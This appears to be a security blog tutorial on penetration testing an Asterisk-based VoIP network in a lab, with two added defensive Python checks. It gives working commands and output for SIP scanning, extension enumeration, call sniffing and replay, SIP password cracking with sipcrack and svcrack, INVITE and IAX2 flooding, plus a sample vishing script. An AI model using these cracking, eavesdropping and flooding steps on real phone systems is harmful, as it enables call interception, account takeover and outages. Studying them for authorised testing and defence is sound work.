Category: Network & Security

2012-07-25 13:33:52

VoIP, or voice over IP (Internet Protocol), is a transmission mode designed for voice and multimedia communications. As IP-based networks like the Internet appear to be the most successful communications infrastructure, the traditional telephone network is currently being replaced by VoIP. Its clear improvements and advantages over the old systems make it a popular substitute. Among those advantages:

  • The low cost of VoIP compared to a traditional telephone network. Any number of services (like Skype) let you communicate PC-to-PC over long or short distances free of charge.
  • VoIP is portable. Portability and mobility are another advantage of VoIP over the traditional telephone; you only need an Internet connection to communicate.
  • VoIP service includes a number of advanced features not normally available with traditional telephone service, including call forwarding, conference calls, caller ID, virtual numbers and more.

The advantages are many, but they are not our main topic of discussion. (Likewise, there are a number of disadvantages: VoIP services depend on Internet connection speed, voice quality depends on the performance of your computer, and so forth.) So why discuss this at all? What we examine here is the security aspect of VoIP. In this article, we will review:

  • An overview of VoIP
  • What is Asterisk? (and what it does)
  • What is Trixbox?
  • VoIP hacking (penetration testing on an Asterisk-based network)

With so many advantages, VoIP is gaining popularity among organizations and private users alike. But what about the security issues? As should be entirely predictable, any new technology immediately presents opportunities for those seeking to cause mischief. This is confirmed by reports I'm sure you've heard about: not just the phone hacking scandal in Britain, but also cases in which thieves easily stole confidential information from a victim because the victim's network was not secure.

If you are a pen tester or ethical hacker, then you already know how important penetration testing of VoIP is: most of the important communications going on today occur over VoIP, so securing confidential information is critical. We will do some practical penetration testing on a VoIP-based network, but first I will show you how it is built.

Asterisk is open-source software that can turn your computer into a communications server. There is Asterisk-based PBX (private branch exchange) software that allows you to make calls and transfer your data.

Trixbox is a wonderful PBX (private branch exchange) software package based on the Asterisk project. It was formerly known as but in October 2006 it was renamed Trixbox. The difference between Trixbox and other PBXs is that Trixbox is based on IP (Internet Protocol) and has been designed for small and medium-sized businesses. There are mainly two versions of Trixbox available: Trixbox CE, which is free and open source, and Trixbox Pro, which you will need to purchase.

Protocols & Ports

You must have an idea of the protocols and their ports before attempting actual penetration testing on a VoIP network.

SIP (Session Initiation Protocol) has been defined by the Internet Engineering Task Force (IETF) as the protocol for VoIP communication (in other words, a signaling protocol). SIP uses ports 5060 and 5061 over both TCP and UDP.

SDP (Session Description Protocol) is for describing multimedia sessions, while MGCP (Media Gateway Control Protocol) uses UDP ports 2427 and 2727.

RTP (Real-time Transport Protocol) defines the packets that deliver video and audio on IP-based networks like VoIP. RTCP (RTP Control Protocol) accompanies RTP and carries control information for the packets that RTP defines.

IAX (Inter-Asterisk eXchange) is an important protocol used in the Asterisk system and is supported by various softphones and PBXs. IAX2 is the second version of IAX and works on UDP port 4569.

VoIP Penetration Testing

The process of penetration testing a VoIP network is generally the same as for any other network: follow the general guidelines, starting with information gathering, as in any form of penetration testing. We will do the same on the VoIP network.

Let's consider a simple scenario: you have found an Asterisk-based PBX while doing a penetration test on a network, like the nmap result shown below:

It might be some sort of VoIP server, so a smart penetration tester would use the available tools to learn more about it. In this section, I will therefore discuss some tools, and their usage, that are really helpful in VoIP penetration testing.

SMAP

SMAP is a useful scanner that detects SIP-enabled devices (it can scan a single IP, a range of IPs or whole subnets) and can fingerprint the VoIP servers it finds, which helps in understanding the VoIP network.

    root@bt:/pentest/voip/smap# ./smap 192.168.1.9
    smap 0.6.0
    192.168.1.9: ICMP reachable, SIP enabled
    1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

It shows that this host is a VoIP server. Let’s try to gather more information.

    root@bt:/pentest/voip/smap# ./smap -O 192.168.1.9
    smap 0.6.0
    192.168.1.9: ICMP reachable, SIP enabled
    best guess (55% sure) fingerprint:
    Asterisk PBX (unknown version)
    User-Agent: Asterisk PBX 1.6.0.26-FONCORE-r78
    1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

-l: fingerprint learning mode. This is another useful option that will give us more information.

SIP-Scan

SIP-Scan works much like SMAP: it is also used to detect SIP-enabled devices, and it can likewise scan an entire range of IPs.

    root@bt:/pentest/voip/sipscan# ./sip-scan -i eth0 192.168.1.1-254
    192.168.1.9: Asterisk PBX 1.6.0.26-FONCORE-r78
    root@bt:/pentest/voip/sipscan#

SIPvicious

SIPvicious is a suite of several useful tools for VoIP penetration testing. We will discuss the most important ones, and their usage, in this section.

Svmap

This is a part of the SIPvicious suite. Svmap is a SIP scanner that can scan for SIP-enabled devices within a network. An example to find a VoIP server in a network is shown below.

    root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1/24
    | SIP Device | User Agent | Fingerprint |
    -------------------------------------------------------------------------------------------------
    | 192.168.1.9:5060 | Asterisk PBX 1.6.0.26-FONCORE-r78 | Asterisk / SJphone/1.60.289a (SJ Labs) |
    root@bt:/pentest/voip/sipvicious#

Extensions Enumeration

Extensions are the devices (a phone or a desktop computer) that can make calls. Extensions are the end nodes, connected to the VoIP server that relays their data. So we need to find the extension numbers in use before we can enumerate the network further.

Svwar

Svwar is part of the SIPvicious tool suite. It’s used to detect the end user (extensions) on a PBX.

    root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-700 192.168.1.9
    | Extension | Authentication |
    ------------------------------
    | 500 | reqauth |
    | 600 | reqauth |

Here -e100-700 defines the possible range of extensions.
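On the PBX side, the two things the svwar run above and the password-cracking steps later in this article depend on are replies that differ for real and bogus extensions, and weak peer secrets. The following is an added defender's example, not code from the article or from the Asterisk project: it audits a constructed chan_sip sip.conf for both; the sample configuration, the COMMON_SECRETS denylist and the length threshold are assumptions for illustration.

```python
import re
# Constructed chan_sip sip.conf (not from the article); the peers match the
# extensions 500 and 600 that svwar found above.
SAMPLE_SIP_CONF = """\
[general]
allowguest=yes
alwaysauthreject=no
[500]
type=friend
secret=500
host=dynamic
[600]
type=friend
secret=12345
host=dynamic
"""

COMMON_SECRETS = {"1234", "12345", "123456", "password", "secret"}  # assumed short denylist

def parse_sip_conf(text):
    """Return {section: {key: value}} for a chan_sip-style file; ';' comments are dropped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        m = re.match(r"\[([^\]]+)\]", line)
        if m:
            current = m.group(1)
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)  # also handles the 'key => value' spelling
            sections[current][key.strip()] = value.lstrip(">").strip()
    return sections

def audit_sip_conf(text):
    """Return (section, finding) pairs. A missing setting counts as a finding here; check
    the default of your Asterisk version before dismissing one."""
    conf, findings = parse_sip_conf(text), []
    general = conf.get("general", {})
    if general.get("alwaysauthreject", "").lower() != "yes":
        findings.append(("general", "alwaysauthreject is not yes: replies differ for real and bogus extensions, which svwar relies on"))
    if general.get("allowguest", "").lower() != "no":
        findings.append(("general", "allowguest is not no: unauthenticated SIP calls are accepted"))
    for name, peer in conf.items():
        secret = peer.get("secret")
        if name == "general" or secret is None:
            continue
        if secret == name or secret in COMMON_SECRETS or len(secret) < 8:
            findings.append((name, "weak secret: a wordlist run like svcrack's would recover it quickly"))
    return findings
```

Running `audit_sip_conf(SAMPLE_SIP_CONF)` reports both [general] settings and both peer secrets; the same file with alwaysauthreject=yes, allowguest=no and long random secrets audits clean.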

Now, after only a little work, we have a lot of information about this VoIP network. We can now easily draw the network topology (these documents are included in the final report).

Here is the network diagram that I have created, based on the information that we have gathered in the above steps.

Sniffing on VoIP Network

The concept of sniffing in a VoIP network is the same as general network sniffing. I will use some of the best-known tools to demonstrate a sniffing attack on a VoIP network. Let us start with Wireshark, which is able to capture VoIP traffic.

Now let's suppose the end users (extensions) are busy communicating with each other, and that an attacker is trying to capture some of the traffic in order to obtain their communication.

Wireshark has captured some traffic. As discussed in the protocol section above, RTP carries the actual content. The question now is: how do we extract it from these packets? Wireshark provides a built-in VoIP feature for this. Open the Telephony tab and choose VoIP Calls. You will then get this window:

Click Player, then Decode. You are now able to listen to this communication and to all of the data available in the audio file.

SIP Authentication Cracking (VoIP Cracking)

The importance of passwords is no secret, so in this section I will show you how to crack the password of any extension (user) on a VoIP network. This attack is the most dangerous, because if an attacker knows your password, then he/she will be able to authenticate on the network using your identity.

The Wireshark result can be used for authentication cracking. Save the capture as name.pcap; we will now use a useful tool called SIPcrack. It contains two scripts: sipdump, which dumps the authentication data from the capture as hashes, and sipcrack, which cracks the VoIP password from those hashes.

    root@bt:~/Desktop/SIPcrack# ./sipdump pass.txt -p aa.pcap
    SIPdump 0.3pre ( MaJoMu | )
    ---------------------------------------
    * Using pcap file 'aa.pcap' for sniffing
    * Starting to sniff with packet filter 'tcp or udp'
    * Dumped login from 192.168.1.9 -> 192.168.1.3 (User: '600')
    Exiting, sniffed 1 logins

sipcrack needs a wordlist to launch the attack; its result is the password.

Another useful tool for cracking SIP passwords is svcrack. Like the others, it can be found in the SIPvicious tool suite. svcrack is well suited to brute-force attacks on SIP accounts.

    root@bt:/pentest/voip/sipvicious# ./svcrack.py -u600 -d list.txt 192.168.1.9
    | Extension | Password |
    ------------------------
    | 600 | 12345 |

Denial of Service Attack on VoIP Network

A denial of service (DoS) attack is a dangerous attack that can cause VoIP network devices to crash. Inviteflood is a tool for launching DoS attacks against any extension (user) on the VoIP network. Usage:

    ./inviteflood interface targetuser targetdomain floodtarget numberofpackets
    ./inviteflood eth0 600 192.168.1.3 192.168.1.3 200000

It is in effect a "ping of death" style attack: it will crash the end user's operating system, leaving the user unable to make any calls.
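The svwar enumeration and the svcrack/sipcrack password guessing shown above leave a trail in the Asterisk chan_sip "Registration ... failed" log on the PBX. The following is an added detection example, not code from the article or from Asterisk: it classifies each source IP from constructed log lines; the line format follows chan_sip's registration-failure notices, and the sample lines and thresholds are assumptions.

```python
import re
from collections import defaultdict

def fail_line(ts, ext, host, reason):
    """Build one constructed chan_sip registration-failure line (sample data, not a real log)."""
    return ("[Jul 25 %s] NOTICE[2231] chan_sip.c: Registration from '\"%s\" <sip:%s@192.168.1.9>' "
            "failed for '%s:5060' - %s" % (ts, ext, ext, host, reason))

# Constructed sample: 192.168.1.5 walks a run of extensions (svwar-like), 192.168.1.7
# keeps guessing the secret of 600 (svcrack-like), 192.168.1.3 is a phone with one typo.
SAMPLE_LOG = "\n".join(
    [fail_line("13:33:%02d" % i, 100 + i, "192.168.1.5", "No matching peer found") for i in range(6)]
    + [fail_line("13:34:%02d" % i, 600, "192.168.1.7", "Wrong password") for i in range(5)]
    + [fail_line("13:35:00", 500, "192.168.1.3", "Wrong password"),
       "[Jul 25 13:35:01] VERBOSE[2231] chan_sip.c: Really destroying SIP dialog"])

FAIL_RE = re.compile(r"Registration from '\"?(?P<user>[^\"'<]+)\"?[^']*' failed for "
                     r"'(?P<host>[\d.]+):\d+' - (?P<reason>.+)$")

def parse_failures(log_text):
    """Yield (user, host, reason) for each registration-failure line; other lines are skipped."""
    for line in log_text.splitlines():
        m = FAIL_RE.search(line)
        if m:
            yield m.group("user"), m.group("host"), m.group("reason")

def classify_sources(log_text, enum_threshold=5, guess_threshold=5):
    """Per source IP: 'enumeration' when it tried >= enum_threshold distinct extensions,
    'password_guessing' when it failed >= guess_threshold times on one extension, else 'noise'."""
    users = defaultdict(set)
    per_user = defaultdict(lambda: defaultdict(int))
    for user, host, _reason in parse_failures(log_text):
        users[host].add(user)
        per_user[host][user] += 1
    verdicts = {}
    for host, seen in users.items():
        if len(seen) >= enum_threshold:
            verdicts[host] = "enumeration"
        elif max(per_user[host].values()) >= guess_threshold:
            verdicts[host] = "password_guessing"
        else:
            verdicts[host] = "noise"
    return verdicts
```

With alwaysauthreject enabled the attacker's view of valid and invalid extensions becomes uniform, but the PBX log still records the attempts, so this classification keeps working.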

Iaxflood is another good tool, one that floods the IAX2 protocol; its usage is very simple:

    root@bt:/pentest/voip/iaxflood# ./iaxflood
    usage: ./iaxflood sourcename destinationname numpackets

A simple usage like:

    root@bt:/pentest/voip/iaxflood# ./iaxflood 192.168.1.13 192.168.1.2 10000
    Will flood port 4569 from port 4569 10000 times
    We have IP_HDRINCL
    Number of Packets sent:
    Sent 10000
    root@bt:/pentest/voip/iaxflood#

Metasploit on VoIP Penetration Testing

Metasploit has several auxiliary modules for VoIP networks. Here are some of the best Metasploit auxiliary modules for VoIP hacking:

  • auxiliary/scanner/sip/options (to find SIP-enabled devices)
  • auxiliary/scanner/sip/enumerator (to enumerate the extensions)

We can do basic VoIP network penetration testing by using the Metasploit auxiliary modules for information gathering and enumeration. We can scan an entire network to find SIP-enabled devices, and the Metasploit auxiliary modules are fast.

    msf > use auxiliary/scanner/sip/options
    msf auxiliary(options) > set RHOSTS 192.168.1.1/24
    RHOSTS => 192.168.1.1/24
    msf auxiliary(options) > run
    [*] 192.168.1.3 sip:nobody@192.168.1.3 agent='WAcjCpW'
    [*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
    [*] 192.168.1.9 200 agent='Asterisk PBX 1.6.0.26-FONCORE-r78' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(options) >

VoIP Phishing

Security awareness is very important. Before concluding this article, I want to briefly discuss VoIP phishing. Phishing is not a new attack, it is old school, but it remains a threat because attackers usually use some social engineering technique to trick a user before stealing his/her credentials. You might have heard about email phishing, in which an attacker directs the victim to a fake page so that they enter their confidential information. In the same fashion, an attacker can hijack your calls to obtain your credentials.

Let’s suppose someone received a call or email like this:

"Hi, this is an urgent email (call) that has been generated by the network administrator. We have found something wrong with your account, so please call back at XXXX-XXXX-XXX to verify your account."

Typically, an unwary user will call back; the attacker may then ask for some confidential information. You need to understand the risk; educate the people around you.

Article excerpted from: